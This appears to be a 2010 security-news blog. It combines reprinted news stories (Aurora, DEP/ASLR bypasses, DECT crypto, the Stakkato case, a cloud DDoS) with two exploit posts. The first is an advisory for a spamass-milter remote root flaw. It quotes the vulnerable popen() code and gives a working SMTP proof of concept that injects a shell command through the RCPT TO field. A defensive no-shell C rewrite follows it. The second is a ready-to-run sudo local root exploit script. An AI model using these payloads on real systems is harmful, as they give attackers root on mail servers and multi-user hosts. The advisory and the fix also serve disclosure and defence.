Mar 8 2010

Spamassassin Milter Plugin Remote Root

Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the shadows not HERE) aka the postfix_joker advisory

Logic fuckup?

March 07 2010 // if you read this 10 years later you are definitely seeking the nice 0days!

Greetz fly out to alex,andi,adize :D
+++ KEEP IT ULTRA PRIV8 +++

Software
+-+-+-+-+
Apache Spamassassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.

SpamAssassin is a project of the Apache Software Foundation (ASF).

Postfix
What is Postfix? It is Wietse Venema’s mailer that started life at IBM
research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.

Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.

Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it calls popen()
on a command string that includes the attacker-supplied recipient (RCPT TO),
so shell metacharacters in the recipient are interpreted by /bin/sh.

From spamass-milter-0.3.1 (-latest) Line 820:

//
// Gets called once for each recipient
//
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)
//

sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
    struct context *sctx = (struct context*)smfi_getpriv(ctx);
    SpamAssassin* assassin = sctx->assassin;
    FILE *p;
#if defined(__FreeBSD__)
    int rv;
#endif

    debug(D_FUNC, "mlfi_envrcpt: enter");

    if (flag_expand)
    {
        /* open a pipe to sendmail so we can do address
           expansion */

        char buf[1024];
        char *fmt="%s -bv \"%s\" 2>&1";

#if defined(HAVE_SNPRINTF)
        snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
        /* XXX possible buffer overflow here // is this a joke ?! */
        sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif

        debug(D_RCPT, "calling %s", buf);

#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
        rv = pthread_mutex_lock(&popen_mutex);
        if (rv)
        {
            debug(D_ALWAYS, "Could not lock popen mutex: %s", strerror(rv));
            abort();
        }
#endif

        p = popen(buf, "r");                                    // [1]
        if (!p)
        {
            debug(D_RCPT, "popen failed(%s). Will not expand aliases", strerror(errno));
            assassin->expandedrcpt.push_back(envrcpt[0]);

[1] the vulnerable popen() call.

Remote Root Exploit PoC through postfix
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me@me.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo

Signed,

Kingcope
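A defender's counterpart to the call flagged at [1], added here as an example; it is not code from spamass-milter or from this advisory. popen() hands its string to /bin/sh -c, so the quote and pipe in the PoC recipient are parsed by the shell. The fork/execv below passes the recipient as one literal argv element and captures the child's stdout and stderr through a pipe instead of "2>&1", so nothing in the address is ever interpreted. The function names, the use of /bin/echo as a stand-in for SENDMAIL (so the example runs offline and shows exactly what the child receives) and the rcpt_is_shell_clean defence-in-depth check are assumptions of this example, not behaviour of the milter.

```c
/* Added example, not spamass-milter code: address expansion without a shell.
 * SENDMAIL is /bin/echo here only so the example runs offline; the child
 * prints its argv, which shows what the real sendmail would receive. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define SENDMAIL "/bin/echo"   /* stand-in for the real sendmail binary */

/* Build the string the original code hands to popen(), so the injected
 * quote and pipe are visible.  Returned from a static buffer; never run. */
const char *build_popen_cmd(const char *rcpt)
{
    static char cmd[1024];
    snprintf(cmd, sizeof cmd, "%s -bv \"%s\" 2>&1", SENDMAIL, rcpt);
    return cmd;
}

/* Defence in depth (hypothetical check): reject recipients containing
 * characters a shell would interpret, so even a code path that still
 * builds a command string cannot be steered.  1 = clean, 0 = reject. */
int rcpt_is_shell_clean(const char *rcpt)
{
    static const char meta[] = "|&;<>()$`\\\"' \t\n*?[]#~";
    for (; *rcpt; rcpt++)
        if (strchr(meta, *rcpt) || (unsigned char)*rcpt < 0x20)
            return 0;
    return 1;
}

/* Run SENDMAIL -bv <rcpt> with rcpt as one argv element and return its
 * combined stdout/stderr from a static buffer, or NULL on failure. */
const char *expand_rcpt_noshell(const char *rcpt)
{
    static char out[4096];
    int fds[2];
    if (pipe(fds) == -1)
        return NULL;
    pid_t pid = fork();
    if (pid == -1) {
        close(fds[0]);
        close(fds[1]);
        return NULL;
    }
    if (pid == 0) {
        /* child: both output streams into the pipe, then exec with an argv;
         * there is no shell, so nothing in rcpt is interpreted */
        dup2(fds[1], STDOUT_FILENO);
        dup2(fds[1], STDERR_FILENO);
        close(fds[0]);
        close(fds[1]);
        char *const argv[] = { SENDMAIL, "-bv", (char *)rcpt, NULL };
        execv(SENDMAIL, argv);
        _exit(127);
    }
    close(fds[1]);
    size_t used = 0;
    while (used + 1 < sizeof out) {
        ssize_t n = read(fds[0], out + used, sizeof out - 1 - used);
        if (n < 0 && errno == EINTR)
            continue;
        if (n <= 0)
            break;
        used += (size_t)n;
    }
    out[used] = '\0';
    close(fds[0]);
    int status;
    if (waitpid(pid, &status, 0) == -1 || !WIFEXITED(status) || WEXITSTATUS(status) != 0)
        return NULL;
    return out;
}

int main(void)
{
    const char *evil = "root+:\"|touch /tmp/foo\"";   /* the advisory's PoC recipient */
    printf("popen() would have run : %s\n", build_popen_cmd(evil));
    printf("shell-clean            : %d\n", rcpt_is_shell_clean(evil));
    const char *got = expand_rcpt_noshell(evil);
    printf("child actually received: %s", got ? got : "(failed)\n");
    return 0;
}
```

Running it prints the popen() string with the recipient's own quote closing the format string's quote and the pipe left free for the shell, followed by the argv version in which the whole recipient arrives in the child as a single unmodified argument.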

Source


Mar 8 2010

As Memory Protections Advance, Exploits Stay a Step Ahead

Despite years of efforts by software security teams at major vendors to harden the operating systems and browsers that are the most common targets of attackers, exploitation of new as well as older vulnerabilities is still simpler than many people might think.

Microsoft, Mozilla, Adobe and even Apple, to some degree, have put in place technologies in their newer products that are designed to make it more difficult for attackers to exploit vulnerabilities, including unknown flaws. However, these technologies, which include DEP, ASLR and SafeSEH, are mitigations, not absolute defenses against exploitation, said Dino Dai Zovi, a researcher and chief scientist at Endgame Systems, in a talk at the RSA Conference here. As effective as some of these technologies can be, they’re not meant to eliminate the possibility of a system being compromised.

“Attack mitigation takes the universe of exploit techniques and narrows it down,” he said. “But preventing the introduction of malicious code isn’t enough to prevent malicious computations.”

Microsoft has been steadily adding memory-protection technologies such as ASLR and DEP to its products over the last few years, and they are now enabled by default in the latest versions of Windows and Internet Explorer. Address Space Layout Randomization (ASLR) is designed to make it more difficult for attackers to overwrite a specific portion of memory by randomizing the location of key areas in a process’s memory. With things in unpredictable locations, it’s much more difficult for attackers to get their data into the right place for an attack.

However, even with ASLR and Data Execution Prevention (DEP) enabled, it’s still possible to exploit vulnerabilities in the most recent versions of IE and Windows. In his talk, Dai Zovi showed a live demonstration in which he exploited the so-called Aurora IE vulnerability on Windows 7 running IE8. This configuration was thought to be immune to such attacks, but Dai Zovi was able to bypass the memory protections by using a combination of several attack techniques chained together. The presence of DEP and ASLR made the attack more difficult, but not impossible.

Dai Zovi said that while his attack worked in this instance, that’s no guarantee that a similar technique would work in another situation.

“Exploitation in the wild that bypasses DEP is pretty rare,” he said. DEP is specifically designed to prevent attackers from forcing applications to execute data from portions of memory that are designated as non-executable.

In fact, Microsoft has acknowledged the limitations of DEP from the beginning, and says that it is simply one of several tools that can help prevent memory corruption attacks.

“DEP presents a hurdle to attackers as they attempt to successfully exploit security vulnerabilities. In some cases, it is possible for an attacker to evade DEP by using an exploitation technique such as return-to-libc. DEP by itself is generally not a robust mitigation. DEP is a critical part of the broader set of exploit mitigation technologies that have been developed by Microsoft such as ASLR, SEHOP, SafeSEH, and /GS. These mitigation technologies complement one another; for example DEP’s weaknesses tend to be offset by ASLR and vice versa. DEP and ASLR used together are very difficult to bypass. The known bypasses that exist have been tied to specific application contexts (such as the IE7 and earlier bypass from Mark Dowd and Alex Sotirov),” Microsoft’s Robert Hensing wrote last year.

But, as Dai Zovi and others have shown, even with these technologies enabled, exploitation is still possible. Attackers have begun using third-party applications to bypass ASLR and DEP on Windows recently. A researcher named Dionysus Blazakis showed in February how he could use a technique called JIT-spraying to exploit a vulnerability in Adobe Flash and bypass both ASLR and DEP. This scenario is not something that Microsoft security engineers would have contemplated or been able to prevent on their end; it’s a result of the complex interactions among applications in production environments, not test labs.

“Systems fail more because of implementation than theory. The real world is complicated,” Dai Zovi said.

Source


Mar 1 2010

Todd Miller Sudo local root exploit discovered by Slouching

From: Kingcope
Date: Tue, 02 Mar 2010 00:08:44 +0100

Just for the record.

#!/bin/sh
# Todd Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# local root exploit
# March 2010
# automated by kingcope
# Full Credits to Slouching
echo Todd Miller Sudo local root exploit
echo by Slouching
echo automated by kingcope
if [ $# != 1 ]
then
echo "usage: ./sudoxpl.sh "
exit
fi
cd /tmp
cat > sudoedit << _EOF
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
_EOF
chmod a+x ./sudoedit
sudo ./sudoedit $1

cheers,
kingcope

Source


Feb 24 2010

US likely to lose a cyber war

In a US Senate Committee on Commerce, Science and Transportation hearing, security experts have expressed extreme concern about US defences against cyber-attacks. Former vice-admiral and head of National Intelligence Michael McConnell even went as far as claiming that the US would be on the losing side should a hostile power launch a cyber war against it. This is not, according to McConnell, because US security staff are less talented or because its technology is inferior, but rather the US is vulnerable because it is the best networked country – for which reason it also has the most to lose.

It is precisely this state of affairs which the recently passed Cybersecurity Enhancement Act of 2009 is intended to resolve. It aims to ensure, by means of training, research and better coordination, that the government and government agencies are better protected against attacks originating from cyberspace. The Act still has to pass through the US Senate.

James Lewis of the Center for Strategic and International Studies (CSIS) also emphasised US vulnerability to attacks. According to Lewis, it is known that countries such as China and Russia are already carrying out espionage to determine how they can disable the US electricity grid. He believes that they and other countries are now in a position to be able to knock out the electricity grid in the event, for example, of a conflict over Taiwan or Georgia. However he thinks it unlikely that China or Russia would go down this route, as it would be too great a risk politically, comparable to bombing a power plant, and would trigger a vigorous US reaction. In addition, he notes, even hostile states would suffer should, for example, Wall Street be knocked out.

However Lewis plays down concerns about terrorist attacks, saying that if terrorists were really in a position to carry out cyber-attacks, they would already have done so. The belief that they are in a position to do so, but have so far held back for whatever reason, is “ridiculous”. Terrorists are, in his opinion, crazy people. Lewis warns that this situation could change if hostile powers were to provide terrorists with the requisite knowledge and skills. Lewis feels that at present, neither China nor Russia would cooperate with extremists.

Nonetheless, the US and the US economy are already being bled by constant small-scale cyber-attacks. According to Lewis, theft of important information and attacks by cyber-criminals are already doing immense damage to both business and government. If no action is taken, the patient will, Lewis told the hearing, eventually bleed to death – therefore he considers passage of the Act to be an urgent necessity.

Source


Feb 23 2010

Intel the victim of “sophisticated” cyberattack

Intel this week said it was the victim of a sophisticated cyberattack that occurred in January around the same time cybercriminals compromised systems at Google, Adobe and more than 30 other large companies.

In its annual 10-K report, a summary of a public company’s performance required by the U.S. Securities and Exchange Commission, Intel said hackers regularly attempt to infiltrate its information technology systems — and are sometimes successful.

“One recent and sophisticated incident occurred in January 2010 around the same time as the recently publicized security incident reported by Google,” Intel wrote in the filing, which was submitted Monday.

Intel did not provide any specifics about the attack, but said hacking attempts may be the result of espionage or others seeking to harm the company.

“It routinely happens,” Intel spokesman Chuck Mulloy told SCMagazineUS.com on Tuesday. “It is not unusual for us to see these sorts of attacks. As a matter of policy, we don’t talk about specifics.”

Mulloy said he could not confirm or deny if the attack that Intel suffered in January was part of the same wave of attacks that hit Google, Adobe and others.

“We mentioned Google because it was very prominent in the news at the time we saw that particular attack,” Mulloy said. “Based on what we know right now, there was no IP [intellectual property] loss.”

In the filing, Intel said it works to detect and investigate cyberattacks to prevent them from recurring, but sometimes the company is not aware of incidents that have occurred, or their effects.

Hacking incidents could lead to the unauthorized use or publication of trade secrets or other confidential business information, Intel said. In addition, cyberattacks also could negatively impact the value of a company’s investments in research and development, along with relationships with third parties and customers.

“Our business could be subjected to significant disruption, and we could suffer monetary and other losses, including the cost of product recalls and returns and reputational harm, in the event of such incidents and claims,” Intel said.

Cyberattacks cost enterprises an average of $2 million per year due to a loss of productivity, revenue and customer trust associated with such events, according to a study released Monday by Symantec.

In January, Google disclosed that its systems were compromised by organized and well-resourced cybercriminals, believed to be operating out of China and who stole intellectual property. The attacks were dubbed “Operation Aurora.”

Other companies reportedly targeted in Operation Aurora included Yahoo, Symantec, Juniper Networks, Northrop Grumman and Dow Chemical, according to the Washington Post, which cited unnamed congressional and industry sources.

Source


Feb 23 2010

U.S. Pinpoints Coder Behind Google Attack

BEIJING (Reuters) – U.S. government analysts believe a Chinese man with government links wrote the key part of a spyware program used in hacker attacks on Google last year, the Financial Times reported on Monday.

The man, a security consultant in his 30s, posted sections of the program to a hacking forum where he described it as something he was “working on,” the paper said, quoting an unidentified researcher working for the U.S. government.

The spyware creator works as a freelancer and did not launch the attack, but Chinese officials had “special access” to his programming, the report said.

“If he wants to do the research he’s good at, he has to toe the line now and again,” the paper quoted the unnamed U.S. government researcher saying.

“He would rather not have uniformed guys looking over his shoulder, but there is no way anyone of his skill level can get away from that kind of thing. The state has privileged access to these researchers’ work.”

The report did not say how analysts knew about the man’s government ties.

The allegations over the spyware are the latest episode in a dispute that has pitted Google and the United States against China, with its wall of Internet controls and legions of hackers.

In January, the giant internet search engine company, Google, threatened to pull back from China and shut its Google.cn Chinese-language portal over complaints of censorship and sophisticated hacking from within China.

Washington has backed those criticisms and urged Beijing to investigate hacking complaints thoroughly and transparently. Beijing has said it opposes hacking.

The Financial Times report also quoted unnamed sources backing a New York Times report that analysts had traced the online attacks to two Chinese educational institutions, the prestigious Shanghai Jiaotong University and the Lanxiang vocational school.

The two establishments have denied the reports. And the allegation that the latter, a high-school level institute that also trains hairdressers, chefs and car mechanics, could take on one of the world’s most powerful Internet firms, has been widely mocked in Chinese cyberspace.

“How can these future cooks be such powerful hackers?” a web user from Zhejiang province said on the portal www.163.com.

The use of the school’s IP address could simply mean that hackers had taken over its computers to hide their tracks.

But Lanxiang’s website also claims to have the “biggest” computer laboratory in the world, a boast it says is confirmed by Guinness World Records.

There was less online comment about the well-respected Jiaotong University, which attracts top graduates and has a School of Information Security Engineering.

(Reporting by Emma Graham-Harrison; Editing by Alex Richardson)

Source


Feb 23 2010

Yes it is possible to resource starve a Cloud Computer

Over the weekend, my cloud computing infrastructure survived a major hacking attack. Here is what happened and what it took to recover it.

This weekend my servers out in the cloud space fended off a major hacking attack across two of the systems that I have given the public access to use. The attack started on Friday night as a simple series of scans to see if there was anything in the IP space that I am using. This is the fairly standard attack pattern that many information security people see every day. Thinking that this was normal, I closed up shop on Friday and went home.

On Sunday I got an alert from the system that it had hung, and when I went to take a look at it using HTTP and SFTP the computer simply would not respond; there was no way to access it. In the control panel provided by the company I use for cloud hosting, I simply rebooted the box, thinking that it was hung on a process that was keeping the box from being accessed. Over Sunday night, I got three more alerts that the box had hung.

Monday morning when I went into work I rebooted the box again (this is a low priority box with almost no regular use over the weekend) and dove into the error logs for the box.

Over the Saturday to Sunday period someone had seriously tried to get into the computer. Over 250 gigs of access logs and over 300 gigs of error logs had almost consumed the disk space that I was using. The computer was not simply hung on a process; it had been resource starved because during the hacking attack the hacker had hit the system so hard that there were no more ports open to make a legitimate connection. Towards the end of the attack (Sunday night) they had hit the computers with what looks like a simple denial of service attack.

My thoughts on this are that my computer survived and came back to operations with a simple reboot of the cloud computer to free up resources that had been consumed during the attack. No data was lost or stolen from the system, and its role is to deliver multimedia and provide data back to a Learning Management System. This meant the loss of some ability for the LMS, but nothing that would have killed the entire system.

The 300 gigs of error logs is overkill; the assumption is that at some point the hacker or hackers got angry enough that they could not get into the system that they simply did a denial of service against the box, aiming to resource starve the system and cause problems for the system administrator over the weekend. I do not think they knew it was on the cloud or that it was a simple matter of rebooting the box to restore services.

The hacker or hackers had failed in getting into the box, which is good, but resorted to DDoS to cause resource starvation as a final act. I do not think we are dealing with a true professional, but I do think we are dealing with a person who is a step above a script kiddie. They had access to an awesome level of firepower for their DDoS; we logged thousands of IPs Sunday night. My belief on this one is that the person or persons had access to a botnet or a very large number of compromised systems to make this work.

I paid 20 cents a gig in bandwidth costs for the attack; with roughly 500 gigs of traffic aimed at the system according to my monitor, I paid 100 dollars to my cloud service provider for bandwidth consumed during the attack.

I only had a temporary loss of one system because of the way that we distributed the cloud architecture across multiple systems in different data centers. As users switched over to different data centers, the system performed as architected; people were able to get their data over the weekend and nothing was truly slowed down or otherwise inaccessible during the attack.

It took two hours to go through the log files on the system to see what had happened. It took 15 minutes to generate the report to IT. This is literally the quickest I have ever gone through an attack, including clean up and log analysis. It is also the cheapest attack I have ever dealt with in terms of loss or dollar costs, which made for a fun hacking attack with a ton of data to use in the classroom and share. The good part is that a distributed architecture in this case worked, which validates the way we built the cloud based system with fail over in mind, not necessarily a hacking attack induced failure of a system.

It is possible to attack a cloud computing system, and it is possible to resource starve a cloud computer, but in the longer run survivability and the ability to get to data rely on the architecture that the system was initially built around. If you are building a cloud space for your company, think in terms of survivability and fail over if a system in your cloud space fails for any reason, and how to recover and still present data to the end user. Hacking attacks happen, and hackers will get angry and try to DDoS your site off the planet; how you architect your cloud space and cloud services will help you survive hackers as well as the occasional other failures in the system.

Source


Feb 16 2010

Old hacks never die, they just attack new systems

As the world becomes increasingly dependent on information technology and digital communications, persistent vulnerabilities — some of which have been known for 50 years — continue to expose the world’s networks and applications to attacks.

“In 2009, the most notable trend is the continued use of existing attack techniques despite the security industry’s awareness of these vulnerabilities,” concluded a Global Security Report that Trustwave released at the Black Hat Federal Briefings in Washington.

Nicholas Percoco, senior vice president of Trustwave’s SpiderLabs, said enterprise administrators are overlooking basic security threats while chasing the newest vulnerabilities. Meanwhile, attackers are taking advantage of the tried-and-true vulnerabilities in addition to the latest zero-day flaws.

Gregory Schaffer, assistant secretary of cybersecurity and communications at the Homeland Security Department, said at the conference that information security should be part of basic enterprise policies, but that message has not yet been heard by top executives.

“We have moved into a space where cybersecurity is central to all business functions,” he said in his keynote address. “But some of the issues we talked about a dozen years ago we are still talking about today. We haven’t made our point to those who don’t do this for a living.”

Security experts from a dozen countries gathered at the conference to immerse themselves in the bits and bytes of the latest research by engineers, analysts and hackers who deconstruct and probe for weak points in software and hardware.

While networks and applications remain vulnerable to old exploits, the latest hardware security devices also will yield their secrets to a determined attacker.

Using an electron microscope to operate at the nanometer scale and Adobe Photoshop to plan his attack, security engineer Christopher Tarnovsky was able to reverse-engineer the family of chips from Infineon Technologies AG, which includes its Trusted Platform Module implementation; gain access to the chip’s data bus; and listen to unencrypted code.

It took him six months of work and the effort would cost an estimated $200,000 to do commercially, said Tarnovsky, who runs Flylogic Engineering and specializes in analyzing semiconductor security. But in the end, “I can get any piece of information stored on the chip,” he told his Black Hat audience.

Source


Feb 9 2010

Sweden Probing Cisco, NASA Hacks

Swedish investigators are probing a hacker U.S. authorities accuse of unlawfully intruding into Cisco Systems, NASA’s Ames Research Center and NASA’s Advanced Supercomputing Division, the authorities said Monday.

Philip Gabriel Pettersson, known in the hacking world as “Stakkato,” allegedly seized computer code that controls internet traffic. After the 2004 breach of Cisco, the proprietary source code for Cisco’s IOS operating system was discovered on a Russian website.

Pettersson was indicted in the United States in May on five hacking counts, (.pdf) but could not be brought from Sweden to the United States for trial. Sweden does not extradite its own citizens, but said it was examining whether to prosecute him in Sweden after U.S. authorities in San Francisco initiated that request.

“The intrusions to Cisco Company and NASA are regarded as computer intrusion according to Swedish law,” Swedish prosecutor Chatrine Rudstrom told federal prosecutors in San Francisco, according to documents released Monday.

Still, Rudstrom told San Francisco federal authorities that Sweden was not guaranteeing it would charge the 21-year-old suspect.

Pettersson was convicted in 2007 of invading the networks of three Swedish universities and ordered to pay $25,000 in damages. He was 16 at the time of the intrusions.

Source


Feb 9 2010

Microscope-wielding boffins crack cordless phone crypto

Cryptographers have broken the proprietary encryption used to prevent eavesdropping on more than 800 million cordless phones worldwide, demonstrating once again the risks of relying on obscure technologies to remain secure.

The attack is the first to crack the cipher at the heart of the DECT, or Digital Enhanced Cordless Telecommunications, standard, which encrypts radio signals as they travel between cordless phones in homes and businesses and corresponding base stations. A previous hack, by contrast, merely exploited weaknesses in the way the algorithm was implemented.

The fatal flaw in the DECT Standard Cipher is its insufficient amount of “pre-ciphering,” which is the encryption equivalent of shaking a cup of dice to make sure they generate unpredictable results. Because the algorithm discards only the first 40 or 80 bits during the encryption process, it’s possible to deduce the secret key after collecting and analyzing enough of the protected conversation.

“This standard, as with everything else we have broken, has been designed some 20 years ago, and it is proprietary encryption,” said Karsten Nohl, one of the cryptographers who helped devise the attack. “It relied on the fact that the encryption was unknown and hence could not be broken. This is a case where something that has some potential for being strong is broken by just this one design decision that in any public review would have been spotted immediately.”

Nohl, 28, is the same University of Virginia microscope-wielding reverse engineer who cracked the encryption in the world’s most widely used smartcard. In December, he struck again after devising a practical attack for eavesdropping on cellphone calls.

He and fellow researchers Erik Tews of the Darmstadt University of Technology and Ralf-Philipp Weinmann of the University of Luxembourg, plan to present their findings Monday at the 2010 Fast Software Encryption workshop in Korea.

Like several of Nohl’s previous hacks, it began with nitric acid and an electron microscope. After dissolving away the epoxy on the silicon chip and then shaving down and magnifying the section dedicated to the DECT encryption, he was able to glean key insights into the underlying algorithm. He then compared the findings against details selectively laid out in a patent and exposed during a debug process.

The results of all three probe methods revealed the fatally insufficient amount of pre-ciphering in the DECT Standard Cipher.

In practical terms, the attack works by collecting bits of the encrypted data stream with known unencrypted contents. In cordless phones, this often comes from a device’s control channel, which broadcasts a variety of predictable data, including call duration and button responses. Sniffing an encrypted conversation with a USRP antenna and the average PC, an attacker would need to collect about four hours of data to break the key in typical scenarios.

In others – such as where DECT is used in restaurants and bars to wirelessly zap payment card details – the time needed to crack the key could be dramatically shorter, Nohl said. The time can also be sped up in a variety of other ways, including by adding certain types of graphics cards to beef up the power of the attacking PC. In some cases, the attack can retrieve the secret key in 10 minutes.

“We expect that some smarter cryptographers than ourselves will find better attacks, of course,” Nohl told El Reg. “We found the algorithm and then implemented the first attack. It’s almost guaranteed that this is not the best attack.”

The DECT Forum, the international body that oversees the standard, said it takes the attack scenarios laid out in the paper seriously and “continues to investigate their applicability.”

The crack of DECT is only the latest time Nohl has defeated the proprietary encryption of a device with critical mass. His 2008 attack on the Mifare Classic smartcard used similar techniques of filing down a silicon chip and then tracing the connections between transistors. His proposed attack of GSM encryption affects cellphones used by more than 800 carriers in 219 countries.

Source